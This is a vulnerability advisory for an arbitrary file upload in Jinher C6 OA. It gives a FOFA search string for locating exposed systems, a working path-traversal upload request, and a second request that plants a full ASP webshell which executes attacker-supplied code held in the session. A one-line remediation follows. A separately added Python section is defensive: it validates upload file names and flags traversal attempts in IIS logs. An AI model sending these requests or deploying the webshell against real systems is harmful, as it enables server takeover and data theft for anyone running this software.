Product overview
Jinher Network (金和网络) is a professional informatization service provider. It supplies Internet+ regulation solutions to municipal regulatory authorities, and offers enterprises and public institutions services such as a collaborative OA system and development platform, an integrated e-government platform, and a smart e-commerce platform.
Vulnerability overview
Jinher C6 UploadFileEditorSave arbitrary file upload: the filename parameter of the upload handler is not restricted, so an attacker can write a server-side script into the web root and gain control of the server.
Fingerprinting
FOFA:
app="金和网络-金和OA"
Exploitation
PoC:
POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\qps4cckjuz.asp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 191
Content-Type: multipart/form-data; boundary=----9fh1lo9qobtszaiahg6v
Accept-Encoding: gzip, deflate

------9fh1lo9qobtszaiahg6v
Content-Disposition: form-data; name="file"; filename="qps4cckjuz.jpg"
Content-Type: image/png

<% response.write(111*111)
%>
------9fh1lo9qobtszaiahg6v--
Verification URL
http://your_ip/C6/<the file name given in the filename parameter>
Uploading a webshell
POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\b.asp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 1282
Content-Type: multipart/form-data; boundary=----9fh1lo9qobtszaiahg6v
Accept-Encoding: gzip, deflate

------9fh1lo9qobtszaiahg6v
Content-Disposition: form-data; name="file"; filename="b.jpg"
Content-Type: image/png

<%
Set AWf2I = Server.CreateObject("Scripting.Dictionary")
Function BPMMI0(content,isBin)
dim size,i,result,keySize
keySize = len(key)
Set C2xl = CreateObject("ADODB.Stream")
C2xl.CharSet = "iso-8859-1"
C2xl.Type = 2
C2xl.Open
if IsArray(content) then
size=UBound(content)+1
For i=1 To size
C2xl.WriteText chrw(ascb(midb(content,i,1)))
Next
end if
C2xl.Position = 0
if isBin then
C2xl.Type = 1
BPMMI0=C2xl.Read()
else
BPMMI0=C2xl.ReadText()
end if
End Function
content = request.BinaryRead(request.TotalBytes)
if len(request.Cookies.Item("hhh"))>0 then
if IsEmpty(Session("payload")) then
content=BPMMI0(content,false)
Session("payload")=content
response.End
else
AWf2I.Add "payload",Session("payload")
Execute(AWf2I("payload"))
result=run(content)
if not IsEmpty(result) then
response.BinaryWrite result
end if
end if
end if
%>
------9fh1lo9qobtszaiahg6v--
Testing the connection
Remediation
Contact the software vendor and update to the latest secure version.
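As an added example (not part of the original advisory and not the vendor's code), the following Python shows the two defender-side checks this class of bug calls for: a server-side file-name validator of the kind the upload handler needs, and a log-triage routine that flags requests to the endpoint above whose filename parameter carries traversal sequences or a script extension. The endpoint path and the parameter name come from the PoC; the sample request records, the extension allow-list and all function names are constructed assumptions.

```python
"""Defender-side checks for a path-traversal file upload of the kind described above.
Added example; not part of the original advisory and not Jinher product code."""
import re
from urllib.parse import parse_qs, unquote
from pathlib import PurePosixPath

# Endpoint and parameter name as they appear in the advisory's PoC.
UPLOAD_ENDPOINT = "/c6/control/uploadfileeditorsave.aspx"

# Constructed sample records in a simplified IIS W3C shape: method cs-uri-stem cs-uri-query.
SAMPLE_REQUESTS = [
    "POST /C6/Control/UploadFileEditorSave.aspx filename=\\....\\....\\C6\\qps4cckjuz.asp",
    "POST /C6/Control/UploadFileEditorSave.aspx filename=report.docx",
    "POST /C6/Control/UploadFileEditorSave.aspx filename=..%2F..%2Fweb.config",
    "GET /C6/index.aspx -",
]

# Assumed allow-list for an editor upload; anything else is rejected.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".docx", ".xlsx"}
# Extensions that classic ASP / ASP.NET on IIS will execute; never accept these.
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".asa", ".ashx", ".asmx", ".cer", ".cdx"}

# Matches "../", "..\" and the "....\" variant used in the PoC (survives a single "../" strip).
TRAVERSAL_RE = re.compile(r"(\.\.|\.{4})[\\/]")


def normalize_filename(raw):
    """Percent-decode twice (to defeat double encoding) and unify path separators."""
    name = raw
    for _ in range(2):
        name = unquote(name)
    return name.replace("\\", "/")


def is_safe_upload_name(raw):
    """Server-side validator: accept only a bare file name with an allow-listed extension.

    Any separator, '..' sequence, null byte, leading dot or script extension is rejected,
    so the handler never has to trust a filter that strips traversal once.
    """
    name = normalize_filename(raw)
    if not name or name.startswith(".") or "/" in name or "\x00" in name or ".." in name:
        return False
    ext = PurePosixPath(name).suffix.lower()
    return ext in ALLOWED_EXTENSIONS and ext not in SCRIPT_EXTENSIONS


def classify_request(line):
    """Triage one 'method stem query' record; returns a list of findings (empty = nothing notable)."""
    parts = line.split(" ", 2)
    if len(parts) != 3:
        return []
    _method, stem, query = parts
    if stem.lower() != UPLOAD_ENDPOINT:
        return []
    findings = []
    for value in parse_qs(query, keep_blank_values=True).get("filename", []):
        name = normalize_filename(value)
        if TRAVERSAL_RE.search(name) or name.startswith("/"):
            findings.append("traversal-in-filename")
        if PurePosixPath(name).suffix.lower() in SCRIPT_EXTENSIONS:
            findings.append("script-extension")
        if not findings and not is_safe_upload_name(value):
            findings.append("disallowed-filename")
    return findings


def triage(records):
    """Return {record: findings} for every record that produced at least one finding."""
    return {rec: f for rec in records if (f := classify_request(rec))}


if __name__ == "__main__":
    for rec, findings in triage(SAMPLE_REQUESTS).items():
        print(f"{', '.join(findings):40s} {rec}")
```

The validator is the fix the handler should apply before any path is built: it canonicalizes first and then rejects rather than sanitizes, so the "....\" trick that survives a single strip of "../" is caught by the blanket ".." rule. The triage routine is meant to run over IIS logs around the upload endpoint; a request whose filename parameter decodes to a traversal sequence or a script extension is by itself a strong indicator that the handler has been probed.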